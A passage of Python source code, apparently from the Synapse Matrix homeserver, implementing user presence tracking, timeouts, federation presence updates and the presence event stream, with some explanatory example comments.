if presence not in valid_presence or (
presence == PresenceState.BUSY and not self._busy_presence_enabled
):
raise SynapseError(400, "Invalid presence state")
user_id = target_user.to_string()
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
# Proxy request to instance that writes presence
await self._set_state_client(
instance_name=self._presence_writer_instance,
user_id=user_id,
state=state,
ignore_status_msg=ignore_status_msg,
force_notify=force_notify,
)
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
# Proxy request to instance that writes presence
user_id = user.to_string()
await self._bump_active_client(
instance_name=self._presence_writer_instance, user_id=user_id
)
class PresenceHandler(BasePresenceHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self.server_name = hs.hostname
self.wheel_timer: WheelTimer[str] = WheelTimer()
self.notifier = hs.get_notifier()
self._presence_enabled = hs.config.server.use_presence
federation_registry = hs.get_federation_registry()
federation_registry.register_edu_handler("m.presence", self.incoming_presence)
LaterGauge(
"synapse_handlers_presence_user_to_current_state_size",
"",
[],
lambda: len(self.user_to_current_state),
)
now = self.clock.time_msec()
for state in self.user_to_current_state.values():
self.wheel_timer.insert(
now=now, obj=state.user_id, then=state.last_active_ts + IDLE_TIMER
)
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_user_sync_ts + SYNC_ONLINE_TIMEOUT,
)
if self.is_mine_id(state.user_id):
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_federation_update_ts + FEDERATION_PING_INTERVAL,
)
else:
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_federation_update_ts + FEDERATION_TIMEOUT,
)
# Set of users who have presence in the `user_to_current_state` that
# have not yet been persisted
self.unpersisted_users_changes: Set[str] = set()
hs.get_reactor().addSystemEventTrigger(
"before",
"shutdown",
run_as_background_process,
"presence.on_shutdown",
self._on_shutdown,
)
self._next_serial = 1
# Keeps track of the number of *ongoing* syncs on this process. While
# this is non zero a user will never go offline.
self.user_to_num_current_syncs: Dict[str, int] = {}
# Keeps track of the number of *ongoing* syncs on other processes.
# While any sync is ongoing on another process the user will never
# go offline.
# Each process has a unique identifier and an update frequency. If
# no update is received from that process within the update period then
# we assume that all the sync requests on that process have stopped.
# Stored as a dict from process_id to set of user_id, and a dict of
# process_id to millisecond timestamp last updated.
self.external_process_to_current_syncs: Dict[str, Set[str]] = {}
self.external_process_last_updated_ms: Dict[str, int] = {}
self.external_sync_linearizer = Linearizer(name="external_sync_linearizer")
if self._presence_enabled:
# Start a LoopingCall in 30s that fires every 5s.
# The initial delay is to allow disconnected clients a chance to
# reconnect before we treat them as offline.
def run_timeout_handler() -> Awaitable[None]:
return run_as_background_process(
"handle_presence_timeouts", self._handle_timeouts
)
self.clock.call_later(
30, self.clock.looping_call, run_timeout_handler, 5000
)
def run_persister() -> Awaitable[None]:
return run_as_background_process(
"persist_presence_changes", self._persist_unpersisted_changes
)
self.clock.call_later(60, self.clock.looping_call, run_persister, 60 * 1000)
LaterGauge(
"synapse_handlers_presence_wheel_timer_size",
"",
[],
lambda: len(self.wheel_timer),
)
# Used to handle sending of presence to newly joined users/servers
if self._presence_enabled:
self.notifier.add_replication_callback(self.notify_new_event)
# Presence is best effort and quickly heals itself, so lets just always
# stream from the current state when we restart.
self._event_pos = self.store.get_room_max_stream_ordering()
self._event_processing = False
async def _on_shutdown(self) -> None:
"""Gets called when shutting down. This lets us persist any updates that
we haven't yet persisted, e.g. updates that only changes some internal
timers. This allows changes to persist across startup without having to
persist every single change.
If this does not run it simply means that some of the timers will fire
        earlier than they should when synapse is restarted. The effect of this
        is some spurious presence changes that will self-correct.
"""
# If the DB pool has already terminated, don't try updating
if not self.store.db_pool.is_running():
return
logger.info(
"Performing _on_shutdown. Persisting %d unpersisted changes",
len(self.user_to_current_state),
)
if self.unpersisted_users_changes:
await self.store.update_presence(
[
self.user_to_current_state[user_id]
for user_id in self.unpersisted_users_changes
]
)
logger.info("Finished _on_shutdown")
async def _persist_unpersisted_changes(self) -> None:
"""We periodically persist the unpersisted changes, as otherwise they
may stack up and slow down shutdown times.
"""
unpersisted = self.unpersisted_users_changes
self.unpersisted_users_changes = set()
if unpersisted:
logger.info("Persisting %d unpersisted presence updates", len(unpersisted))
await self.store.update_presence(
[self.user_to_current_state[user_id] for user_id in unpersisted]
)
async def _update_states(
self, new_states: Iterable[UserPresenceState], force_notify: bool = False
) -> None:
"""Updates presence of users. Sets the appropriate timeouts. Pokes
the notifier and federation if and only if the changed presence state
should be sent to clients/servers.
Args:
new_states: The new user presence state updates to process.
force_notify: Whether to force notifying clients of this presence state update,
even if it doesn't change the state of a user's presence (e.g online -> online).
This is currently used to bump the max presence stream ID without changing any
user's presence (see PresenceHandler.add_users_to_send_full_presence_to).
"""
now = self.clock.time_msec()
with Measure(self.clock, "presence_update_states"):
# NOTE: We purposefully don't await between now and when we've
# calculated what we want to do with the new states, to avoid races.
to_notify = {} # Changes we want to notify everyone about
to_federation_ping = {} # These need sending keep-alives
# Only bother handling the last presence change for each user
new_states_dict = {}
for new_state in new_states:
new_states_dict[new_state.user_id] = new_state
new_states = new_states_dict.values()
for new_state in new_states:
user_id = new_state.user_id
                # It's fine to not hit the database here, as the only thing not in
# the current state cache are OFFLINE states, where the only field
# of interest is last_active which is safe enough to assume is 0
# here.
prev_state = self.user_to_current_state.get(
user_id, UserPresenceState.default(user_id)
)
new_state, should_notify, should_ping = handle_update(
prev_state,
new_state,
is_mine=self.is_mine_id(user_id),
wheel_timer=self.wheel_timer,
now=now,
)
if force_notify:
should_notify = True
self.user_to_current_state[user_id] = new_state
if should_notify:
to_notify[user_id] = new_state
elif should_ping:
to_federation_ping[user_id] = new_state
# TODO: We should probably ensure there are no races hereafter
presence_updates_counter.inc(len(new_states))
if to_notify:
notified_presence_counter.inc(len(to_notify))
await self._persist_and_notify(list(to_notify.values()))
self.unpersisted_users_changes |= {s.user_id for s in new_states}
self.unpersisted_users_changes -= set(to_notify.keys())
# Check if we need to resend any presence states to remote hosts. We
# only do this for states that haven't been updated in a while to
# ensure that the remote host doesn't time the presence state out.
#
# Note that since these are states that have *not* been updated,
# they won't get sent down the normal presence replication stream,
# and so we have to explicitly send them via the federation stream.
to_federation_ping = {
user_id: state
for user_id, state in to_federation_ping.items()
if user_id not in to_notify
}
if to_federation_ping:
federation_presence_out_counter.inc(len(to_federation_ping))
hosts_to_states = await get_interested_remotes(
self.store,
self.presence_router,
list(to_federation_ping.values()),
)
for destination, states in hosts_to_states.items():
self._federation_queue.send_presence_to_destinations(
states, [destination]
)
async def _handle_timeouts(self) -> None:
"""Checks the presence of users that have timed out and updates as
appropriate.
"""
logger.debug("Handling presence timeouts")
now = self.clock.time_msec()
# Fetch the list of users that *may* have timed out. Things may have
# changed since the timeout was set, so we won't necessarily have to
# take any action.
users_to_check = set(self.wheel_timer.fetch(now))
# Check whether the lists of syncing processes from an external
# process have expired.
expired_process_ids = [
process_id
for process_id, last_update in self.external_process_last_updated_ms.items()
if now - last_update > EXTERNAL_PROCESS_EXPIRY
]
for process_id in expired_process_ids:
# For each expired process drop tracking info and check the users
# that were syncing on that process to see if they need to be timed
# out.
users_to_check.update(
self.external_process_to_current_syncs.pop(process_id, ())
)
self.external_process_last_updated_ms.pop(process_id)
states = [
self.user_to_current_state.get(user_id, UserPresenceState.default(user_id))
for user_id in users_to_check
]
timers_fired_counter.inc(len(states))
syncing_user_ids = {
user_id
for user_id, count in self.user_to_num_current_syncs.items()
if count
}
for user_ids in self.external_process_to_current_syncs.values():
syncing_user_ids.update(user_ids)
changes = handle_timeouts(
states,
is_mine_fn=self.is_mine_id,
syncing_user_ids=syncing_user_ids,
now=now,
)
return await self._update_states(changes)
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
user_id = user.to_string()
bump_active_time_counter.inc()
prev_state = await self.current_state_for_user(user_id)
new_fields: Dict[str, Any] = {"last_active_ts": self.clock.time_msec()}
if prev_state.state == PresenceState.UNAVAILABLE:
new_fields["state"] = PresenceState.ONLINE
await self._update_states([prev_state.copy_and_replace(**new_fields)])
async def user_syncing(
self, user_id: str, affect_presence: bool = True
) -> ContextManager[None]:
"""Returns a context manager that should surround any stream requests
from the user.
This allows us to keep track of who is currently streaming and who isn't
without having to have timers outside of this module to avoid flickering
when users disconnect/reconnect.
Args:
user_id
affect_presence: If false this function will be a no-op.
Useful for streams that are not associated with an actual
client that is being used by a user.
"""
# Override if it should affect the user's presence, if presence is
# disabled.
if not self.hs.config.server.use_presence:
affect_presence = False
if affect_presence:
curr_sync = self.user_to_num_current_syncs.get(user_id, 0)
self.user_to_num_current_syncs[user_id] = curr_sync + 1
prev_state = await self.current_state_for_user(user_id)
if prev_state.state == PresenceState.OFFLINE:
# If they're currently offline then bring them online, otherwise
# just update the last sync times.
await self._update_states(
[
prev_state.copy_and_replace(
state=PresenceState.ONLINE,
last_active_ts=self.clock.time_msec(),
last_user_sync_ts=self.clock.time_msec(),
)
]
)
else:
await self._update_states(
[
prev_state.copy_and_replace(
last_user_sync_ts=self.clock.time_msec()
)
]
)
async def _end() -> None:
try:
self.user_to_num_current_syncs[user_id] -= 1
prev_state = await self.current_state_for_user(user_id)
await self._update_states(
[
prev_state.copy_and_replace(
last_user_sync_ts=self.clock.time_msec()
)
]
)
except Exception:
logger.exception("Error updating presence after sync")
@contextmanager
def _user_syncing() -> Generator[None, None, None]:
try:
yield
finally:
if affect_presence:
run_in_background(_end)
return _user_syncing()
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
# since we are the process handling presence, there is nothing to do here.
return []
async def update_external_syncs_row(
self, process_id: str, user_id: str, is_syncing: bool, sync_time_msec: int
) -> None:
"""Update the syncing users for an external process as a delta.
Args:
process_id: An identifier for the process the users are
syncing against. This allows synapse to process updates
as user start and stop syncing against a given process.
user_id: The user who has started or stopped syncing
is_syncing: Whether or not the user is now syncing
sync_time_msec: Time in ms when the user was last syncing
"""
with (await self.external_sync_linearizer.queue(process_id)):
prev_state = await self.current_state_for_user(user_id)
process_presence = self.external_process_to_current_syncs.setdefault(
process_id, set()
)
updates = []
if is_syncing and user_id not in process_presence:
if prev_state.state == PresenceState.OFFLINE:
updates.append(
prev_state.copy_and_replace(
state=PresenceState.ONLINE,
last_active_ts=sync_time_msec,
last_user_sync_ts=sync_time_msec,
)
)
else:
updates.append(
prev_state.copy_and_replace(last_user_sync_ts=sync_time_msec)
)
process_presence.add(user_id)
elif user_id in process_presence:
updates.append(
prev_state.copy_and_replace(last_user_sync_ts=sync_time_msec)
)
if not is_syncing:
process_presence.discard(user_id)
if updates:
await self._update_states(updates)
self.external_process_last_updated_ms[process_id] = self.clock.time_msec()
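# Illustrative sketch (not part of the original module): a worker that handles
# sync traffic could report its users to the presence writer roughly like
#
#     await presence_handler.update_external_syncs_row(
#         process_id="synchrotron-1",   # hypothetical worker name
#         user_id="@alice:example.com",
#         is_syncing=True,
#         sync_time_msec=clock.time_msec(),  # `clock` stands for the homeserver clock
#     )
#
# and call update_external_syncs_clear("synchrotron-1") once it shuts down so
# its users are not left marked as syncing.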
async def update_external_syncs_clear(self, process_id: str) -> None:
"""Marks all users that had been marked as syncing by a given process
as offline.
Used when the process has stopped/disappeared.
"""
with (await self.external_sync_linearizer.queue(process_id)):
process_presence = self.external_process_to_current_syncs.pop(
process_id, set()
)
prev_states = await self.current_state_for_users(process_presence)
time_now_ms = self.clock.time_msec()
await self._update_states(
[
prev_state.copy_and_replace(last_user_sync_ts=time_now_ms)
for prev_state in prev_states.values()
]
)
self.external_process_last_updated_ms.pop(process_id, None)
async def current_state_for_user(self, user_id: str) -> UserPresenceState:
"""Get the current presence state for a user."""
res = await self.current_state_for_users([user_id])
return res[user_id]
async def _persist_and_notify(self, states: List[UserPresenceState]) -> None:
"""Persist states in the database, poke the notifier and send to
interested remote servers
"""
stream_id, max_token = await self.store.update_presence(states)
parties = await get_interested_parties(self.store, self.presence_router, states)
room_ids_to_states, users_to_states = parties
self.notifier.on_new_event(
"presence_key",
stream_id,
rooms=room_ids_to_states.keys(),
users=[UserID.from_string(u) for u in users_to_states],
)
# We only want to poke the local federation sender, if any, as other
# workers will receive the presence updates via the presence replication
# stream (which is updated by `store.update_presence`).
await self.maybe_send_presence_to_interested_destinations(states)
async def incoming_presence(self, origin: str, content: JsonDict) -> None:
"""Called when we receive a `m.presence` EDU from a remote server."""
if not self._presence_enabled:
return
now = self.clock.time_msec()
updates = []
for push in content.get("push", []):
# A "push" contains a list of presence that we are probably interested
# in.
user_id = push.get("user_id", None)
if not user_id:
logger.info(
"Got presence update from %r with no 'user_id': %r", origin, push
)
continue
if get_domain_from_id(user_id) != origin:
logger.info(
"Got presence update from %r with bad 'user_id': %r",
origin,
user_id,
)
continue
presence_state = push.get("presence", None)
if not presence_state:
logger.info(
"Got presence update from %r with no 'presence_state': %r",
origin,
push,
)
continue
new_fields = {"state": presence_state, "last_federation_update_ts": now}
last_active_ago = push.get("last_active_ago", None)
if last_active_ago is not None:
new_fields["last_active_ts"] = now - last_active_ago
new_fields["status_msg"] = push.get("status_msg", None)
new_fields["currently_active"] = push.get("currently_active", False)
prev_state = await self.current_state_for_user(user_id)
updates.append(prev_state.copy_and_replace(**new_fields))
if updates:
federation_presence_counter.inc(len(updates))
await self._update_states(updates)
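# Illustrative sketch (not part of the original module): judging from the
# fields read above, the m.presence EDU content handled here looks roughly like
#
#     {
#         "push": [
#             {
#                 "user_id": "@bob:remote.example",
#                 "presence": "online",
#                 "last_active_ago": 5000,
#                 "status_msg": "away from keyboard",
#                 "currently_active": True,
#             }
#         ]
#     }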
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
status_msg = state.get("status_msg", None)
presence = state["presence"]
valid_presence = (
PresenceState.ONLINE,
PresenceState.UNAVAILABLE,
PresenceState.OFFLINE,
PresenceState.BUSY,
)
if presence not in valid_presence or (
presence == PresenceState.BUSY and not self._busy_presence_enabled
):
raise SynapseError(400, "Invalid presence state")
user_id = target_user.to_string()
prev_state = await self.current_state_for_user(user_id)
new_fields = {"state": presence}
if not ignore_status_msg:
new_fields["status_msg"] = status_msg
if presence == PresenceState.ONLINE or (
presence == PresenceState.BUSY and self._busy_presence_enabled
):
new_fields["last_active_ts"] = self.clock.time_msec()
await self._update_states(
[prev_state.copy_and_replace(**new_fields)], force_notify=force_notify
)
async def is_visible(self, observed_user: UserID, observer_user: UserID) -> bool:
"""Returns whether a user can see another user's presence."""
observer_room_ids = await self.store.get_rooms_for_user(
observer_user.to_string()
)
observed_room_ids = await self.store.get_rooms_for_user(
observed_user.to_string()
)
if observer_room_ids & observed_room_ids:
return True
return False
async def get_all_presence_updates(
self, instance_name: str, last_id: int, current_id: int, limit: int
) -> Tuple[List[Tuple[int, list]], int, bool]:
"""
Gets a list of presence update rows from between the given stream ids.
Each row has:
- stream_id(str)
- user_id(str)
- state(str)
- last_active_ts(int)
- last_federation_update_ts(int)
- last_user_sync_ts(int)
- status_msg(str)
- currently_active(int)
Args:
instance_name: The writer we want to fetch updates from. Unused
here since there is only ever one writer.
last_id: The token to fetch updates from. Exclusive.
current_id: The token to fetch updates up to. Inclusive.
limit: The requested limit for the number of rows to return. The
function may return more or fewer rows.
Returns:
A tuple consisting of: the updates, a token to use to fetch
subsequent updates, and whether we returned fewer rows than exists
between the requested tokens due to the limit.
The token returned can be used in a subsequent call to this
function to get further updates.
The updates are a list of 2-tuples of stream ID and the row data
"""
# TODO(markjh): replicate the unpersisted changes.
# This could use the in-memory stores for recent changes.
rows = await self.store.get_all_presence_updates(
instance_name, last_id, current_id, limit
)
return rows
def notify_new_event(self) -> None:
"""Called when new events have happened. Handles users and servers
joining rooms that require being sent presence.
"""
if self._event_processing:
return
async def _process_presence() -> None:
assert not self._event_processing
self._event_processing = True
try:
await self._unsafe_process()
finally:
self._event_processing = False
run_as_background_process("presence.notify_new_event", _process_presence)
async def _unsafe_process(self) -> None:
# Loop round handling deltas until we're up to date
while True:
with Measure(self.clock, "presence_delta"):
room_max_stream_ordering = self.store.get_room_max_stream_ordering()
if self._event_pos == room_max_stream_ordering:
return
logger.debug(
"Processing presence stats %s->%s",
self._event_pos,
room_max_stream_ordering,
)
max_pos, deltas = await self.store.get_current_state_deltas(
self._event_pos, room_max_stream_ordering
)
# We may get multiple deltas for different rooms, but we want to
# handle them on a room by room basis, so we batch them up by
# room.
deltas_by_room: Dict[str, List[JsonDict]] = {}
for delta in deltas:
deltas_by_room.setdefault(delta["room_id"], []).append(delta)
for room_id, deltas_for_room in deltas_by_room.items():
await self._handle_state_delta(room_id, deltas_for_room)
self._event_pos = max_pos
# Expose current event processing position to prometheus
synapse.metrics.event_processing_positions.labels("presence").set(
max_pos
)
async def _handle_state_delta(self, room_id: str, deltas: List[JsonDict]) -> None:
"""Process current state deltas for the room to find new joins that need
to be handled.
"""
# Sets of newly joined users. Note that if the local server is
# joining a remote room for the first time we'll see both the joining
# user and all remote users as newly joined.
newly_joined_users = set()
for delta in deltas:
assert room_id == delta["room_id"]
typ = delta["type"]
state_key = delta["state_key"]
event_id = delta["event_id"]
prev_event_id = delta["prev_event_id"]
logger.debug("Handling: %r %r, %s", typ, state_key, event_id)
# Drop any event that isn't a membership join
if typ != EventTypes.Member:
continue
if event_id is None:
# state has been deleted, so this is not a join. We only care about
# joins.
continue
event = await self.store.get_event(event_id, allow_none=True)
if not event or event.content.get("membership") != Membership.JOIN:
# We only care about joins
continue
if prev_event_id:
prev_event = await self.store.get_event(prev_event_id, allow_none=True)
if (
prev_event
and prev_event.content.get("membership") == Membership.JOIN
):
# Ignore changes to join events.
continue
newly_joined_users.add(state_key)
if not newly_joined_users:
# If nobody has joined then there's nothing to do.
return
# We want to send:
# 1. presence states of all local users in the room to newly joined
# remote servers
# 2. presence states of newly joined users to all remote servers in
# the room.
#
# TODO: Only send presence states to remote hosts that don't already
# have them (because they already share rooms).
# Get all the users who were already in the room, by fetching the
# current users in the room and removing the newly joined users.
users = await self.store.get_users_in_room(room_id)
prev_users = set(users) - newly_joined_users
# Construct sets for all the local users and remote hosts that were
# already in the room
prev_local_users = []
prev_remote_hosts = set()
for user_id in prev_users:
if self.is_mine_id(user_id):
prev_local_users.append(user_id)
else:
prev_remote_hosts.add(get_domain_from_id(user_id))
# Similarly, construct sets for all the local users and remote hosts
# that were *not* already in the room. Care needs to be taken when
# calculating the remote hosts, as a host may have already been in the
# room even if there is a newly joined user from that host.
newly_joined_local_users = []
newly_joined_remote_hosts = set()
for user_id in newly_joined_users:
if self.is_mine_id(user_id):
newly_joined_local_users.append(user_id)
else:
host = get_domain_from_id(user_id)
if host not in prev_remote_hosts:
newly_joined_remote_hosts.add(host)
# Send presence states of all local users in the room to newly joined
# remote servers. (We actually only send states for local users already
# in the room, as we'll send states for newly joined local users below.)
if prev_local_users and newly_joined_remote_hosts:
local_states = await self.current_state_for_users(prev_local_users)
# Filter out old presence, i.e. offline presence states where
# the user hasn't been active for a week. We can change this
# depending on what we want the UX to be, but at the least we
# should filter out offline presence where the state is just the
# default state.
now = self.clock.time_msec()
states = [
state
for state in local_states.values()
if state.state != PresenceState.OFFLINE
or now - state.last_active_ts < 7 * 24 * 60 * 60 * 1000
or state.status_msg is not None
]
self._federation_queue.send_presence_to_destinations(
destinations=newly_joined_remote_hosts,
states=states,
)
# Send presence states of newly joined users to all remote servers in
# the room
if newly_joined_local_users and (
prev_remote_hosts or newly_joined_remote_hosts
):
local_states = await self.current_state_for_users(newly_joined_local_users)
self._federation_queue.send_presence_to_destinations(
destinations=prev_remote_hosts | newly_joined_remote_hosts,
states=list(local_states.values()),
)
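# Illustrative sketch (not part of the original module, and assuming
# local.example is this homeserver): if a room already contains
# @old:local.example and @other:remote1.example, and in this batch of deltas
# @new:local.example plus @new:remote2.example join, then
#
#     prev_local_users          == ["@old:local.example"]
#     prev_remote_hosts         == {"remote1.example"}
#     newly_joined_local_users  == ["@new:local.example"]
#     newly_joined_remote_hosts == {"remote2.example"}
#
# so existing local presence is sent to remote2.example, and the presence of
# @new:local.example is sent to both remote hosts.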
def should_notify(old_state: UserPresenceState, new_state: UserPresenceState) -> bool:
"""Decides if a presence state change should be sent to interested parties."""
if old_state == new_state:
return False
if old_state.status_msg != new_state.status_msg:
notify_reason_counter.labels("status_msg_change").inc()
return True
if old_state.state != new_state.state:
notify_reason_counter.labels("state_change").inc()
state_transition_counter.labels(old_state.state, new_state.state).inc()
return True
if old_state.state == PresenceState.ONLINE:
if new_state.currently_active != old_state.currently_active:
notify_reason_counter.labels("current_active_change").inc()
return True
if (
new_state.last_active_ts - old_state.last_active_ts
> LAST_ACTIVE_GRANULARITY
):
# Only notify about last active bumps if we're not currently active
if not new_state.currently_active:
notify_reason_counter.labels("last_active_change_online").inc()
return True
elif new_state.last_active_ts - old_state.last_active_ts > LAST_ACTIVE_GRANULARITY:
# Always notify for a transition where last active gets bumped.
notify_reason_counter.labels("last_active_change_not_online").inc()
return True
return False
def format_user_presence_state(
state: UserPresenceState, now: int, include_user_id: bool = True
) -> JsonDict:
"""Convert UserPresenceState to a JSON format that can be sent down to clients
and to other servers.
Args:
state: The user presence state to format.
now: The current timestamp since the epoch in ms.
include_user_id: Whether to include `user_id` in the returned dictionary.
As this function can be used both to format presence updates for client /sync
responses and for federation /send requests, only the latter needs to include
the `user_id` field.
Returns:
A JSON dictionary with the following keys:
* presence: The presence state as a str.
* user_id: Optional. Included if `include_user_id` is truthy. The canonical
Matrix ID of the user.
* last_active_ago: Optional. Included if `last_active_ts` is set on `state`.
The number of milliseconds since the user was last active.
* status_msg: Optional. Included if `status_msg` is set on `state`. The user's
status.
* currently_active: Optional. Included only if `state.state` is "online".
Example:
{
"presence": "online",
"user_id": "@alice:example.com",
"last_active_ago": 16783813918,
"status_msg": "Hello world!",
"currently_active": True
}
"""
content: JsonDict = {"presence": state.state}
if include_user_id:
content["user_id"] = state.user_id
if state.last_active_ts:
content["last_active_ago"] = now - state.last_active_ts
if state.status_msg:
content["status_msg"] = state.status_msg
if state.state == PresenceState.ONLINE:
content["currently_active"] = state.currently_active
return content
class PresenceEventSource(EventSource[int, UserPresenceState]):
def __init__(self, hs: "HomeServer"):
# We can't call get_presence_handler here because there's a cycle:
#
# Presence -> Notifier -> PresenceEventSource -> Presence
#
# Same with get_presence_router:
#
# AuthHandler -> Notifier -> PresenceEventSource -> ModuleApi -> AuthHandler
self.get_presence_handler = hs.get_presence_handler
self.get_presence_router = hs.get_presence_router
self.clock = hs.get_clock()
self.store = hs.get_datastore()
@log_function
async def get_new_events(
self,
user: UserID,
from_key: Optional[int],
limit: Optional[int] = None,
room_ids: Optional[Collection[str]] = None,
is_guest: bool = False,
explicit_room_id: Optional[str] = None,
include_offline: bool = True,
service: Optional[ApplicationService] = None,
) -> Tuple[List[UserPresenceState], int]:
# The process for getting presence events is:
# 1. Get the rooms the user is in.
# 2. Get the list of users in the rooms.
# 3. Get the list of users that are in the user's presence list.
# 4. If there is a from_key set, cross reference the list of users
# with the `presence_stream_cache` to see which ones we actually
# need to check.
# 5. Load current state for the users.
#
# We don't try and limit the presence updates by the current token, as
# sending down the rare duplicate is not a concern.
user_id = user.to_string()
stream_change_cache = self.store.presence_stream_cache
with Measure(self.clock, "presence.get_new_events"):
if from_key is not None:
from_key = int(from_key)
# Check if this user should receive all current, online user presence. We only
# bother to do this if from_key is set, as otherwise the user will receive all
# user presence anyways.
if await self.store.should_user_receive_full_presence_with_token(
user_id, from_key
):
# This user has been specified by a module to receive all current, online
# user presence. Removing from_key and setting include_offline to false
# will effectively do this.
from_key = None
include_offline = False
max_token = self.store.get_current_presence_token()
if from_key == max_token:
# This is necessary as due to the way stream ID generators work
# we may get updates that have a stream ID greater than the max
# token (e.g. max_token is N but stream generator may return
# results for N+2, due to N+1 not having finished being
# persisted yet).
#
# This is usually fine, as it just means that we may send down
# some presence updates multiple times. However, we need to be
# careful that the sync stream either actually does make some
# progress or doesn't return, otherwise clients will end up
# tight looping calling /sync due to it immediately returning
# the same token repeatedly.
#
# Hence this guard where we just return nothing so that the sync
# doesn't return. C.f. #5503.
return [], max_token
# Figure out which other users this user should receive updates for
users_interested_in = await self._get_interested_in(user, explicit_room_id)
# We have a set of users that we're interested in the presence of. We want to
# cross-reference that with the users that have actually changed their presence.
# Check whether this user should see all user updates
if users_interested_in == PresenceRouter.ALL_USERS:
# Provide presence state for all users
presence_updates = await self._filter_all_presence_updates_for_user(
user_id, include_offline, from_key
)
return presence_updates, max_token
# Make mypy happy. users_interested_in should now be a set
assert not isinstance(users_interested_in, str)
# The set of users that we're interested in and that have had a presence update.
# We'll actually pull the presence updates for these users at the end.
interested_and_updated_users: Union[Set[str], FrozenSet[str]] = set()
if from_key:
# First get all users that have had a presence update
updated_users = stream_change_cache.get_all_entities_changed(from_key)
# Cross-reference users we're interested in with those that have had updates.
# Use a slightly-optimised method for processing smaller sets of updates.
if updated_users is not None and len(updated_users) < 500:
# For small deltas, it's quicker to get all changes and then
# cross-reference with the users we're interested in
get_updates_counter.labels("stream").inc()
for other_user_id in updated_users:
if other_user_id in users_interested_in:
# mypy thinks this variable could be a FrozenSet as it's possibly set
# to one in the `get_entities_changed` call below, and `add()` is not a
# method on a FrozenSet. That doesn't affect us here though, as
# `interested_and_updated_users` is clearly a set() above.
interested_and_updated_users.add(other_user_id) # type: ignore
else:
# Too many possible updates. Find all users we can see and check
# if any of them have changed.
get_updates_counter.labels("full").inc()
interested_and_updated_users = (
stream_change_cache.get_entities_changed(
users_interested_in, from_key
)
)
else:
# No from_key has been specified. Return the presence for all users
# this user is interested in
interested_and_updated_users = users_interested_in
# Retrieve the current presence state for each user
users_to_state = await self.get_presence_handler().current_state_for_users(
interested_and_updated_users
)
presence_updates = list(users_to_state.values())
if not include_offline:
# Filter out offline presence states
presence_updates = self._filter_offline_presence_state(presence_updates)
return presence_updates, max_token
async def _filter_all_presence_updates_for_user(
self,
user_id: str,
include_offline: bool,
from_key: Optional[int] = None,
) -> List[UserPresenceState]:
"""
Computes the presence updates a user should receive.
First pulls presence updates from the database. Then consults PresenceRouter
for whether any updates should be excluded by user ID.
Args:
user_id: The User ID of the user to compute presence updates for.
include_offline: Whether to include offline presence states from the results.
from_key: The minimum stream ID of updates to pull from the database
before filtering.
Returns:
A list of presence states for the given user to receive.
"""
if from_key:
# Only return updates since the last sync
updated_users = self.store.presence_stream_cache.get_all_entities_changed(
from_key
)
if not updated_users:
updated_users = []
# Get the actual presence update for each change
users_to_state = await self.get_presence_handler().current_state_for_users(
updated_users
)
presence_updates = list(users_to_state.values())
if not include_offline:
# Filter out offline states
presence_updates = self._filter_offline_presence_state(presence_updates)
else:
users_to_state = await self.store.get_presence_for_all_users(
include_offline=include_offline
)
presence_updates = list(users_to_state.values())
# TODO: This feels wildly inefficient, and it's unfortunate we need to ask the
# module for information on a number of users when we then only take the info
# for a single user
# Filter through the presence router
users_to_state_set = await self.get_presence_router().get_users_for_states(
presence_updates
)
# We only want the mapping for the syncing user
presence_updates = list(users_to_state_set[user_id])
# Return presence information for all users
return presence_updates
def _filter_offline_presence_state(
self, presence_updates: Iterable[UserPresenceState]
) -> List[UserPresenceState]:
"""Given an iterable containing user presence updates, return a list with any offline
presence states removed.
Args:
presence_updates: Presence states to filter
Returns:
A new list with any offline presence states removed.
"""
return [
update
for update in presence_updates
if update.state != PresenceState.OFFLINE
]
def get_current_key(self) -> int:
return self.store.get_current_presence_token()
@cached(num_args=2, cache_context=True)
async def _get_interested_in(
self,
user: UserID,
explicit_room_id: Optional[str] = None,
cache_context: Optional[_CacheContext] = None,
) -> Union[Set[str], str]:
"""Returns the set of users that the given user should see presence
updates for.
Args:
user: The user to retrieve presence updates for.
explicit_room_id: If set, presence for the users in this room is also returned.
Returns:
A set of user IDs to return presence updates for, or "ALL" to return all
known updates.
"""
user_id = user.to_string()
users_interested_in = set()
users_interested_in.add(user_id) # So that we receive our own presence
# cache_context isn't likely to ever be None due to the @cached decorator,
# but we can't have a non-optional argument after the optional argument
# explicit_room_id either. Assert cache_context is not None so we can use it
# without mypy complaining.
assert cache_context
# Check with the presence router whether we should poll additional users for
# their presence information
additional_users = await self.get_presence_router().get_interested_users(
user.to_string()
)
if additional_users == PresenceRouter.ALL_USERS:
# If the module requested that this user see the presence updates of *all*
# users, then simply return that instead of calculating what rooms this
# user shares
return PresenceRouter.ALL_USERS
# Add the additional users from the router
users_interested_in.update(additional_users)
# Find the users who share a room with this user
users_who_share_room = await self.store.get_users_who_share_room_with_user(
user_id, on_invalidate=cache_context.invalidate
)
users_interested_in.update(users_who_share_room)
if explicit_room_id:
user_ids = await self.store.get_users_in_room(
explicit_room_id, on_invalidate=cache_context.invalidate
)
users_interested_in.update(user_ids)
return users_interested_in
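# Illustrative sketch (not part of the original module): for @alice:example.com
# the returned set is roughly
#
#     {"@alice:example.com"}                        # always contains the user themselves
#     | <users added by the presence router>
#     | <users sharing a room with @alice>
#     | <users in explicit_room_id, when one is given>
#
# unless the router asks for ALL_USERS, in which case that sentinel string is
# returned unchanged.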
def handle_timeouts(
user_states: List[UserPresenceState],
is_mine_fn: Callable[[str], bool],
syncing_user_ids: Set[str],
now: int,
) -> List[UserPresenceState]:
"""Checks the presence of users that have timed out and updates as
appropriate.
Args:
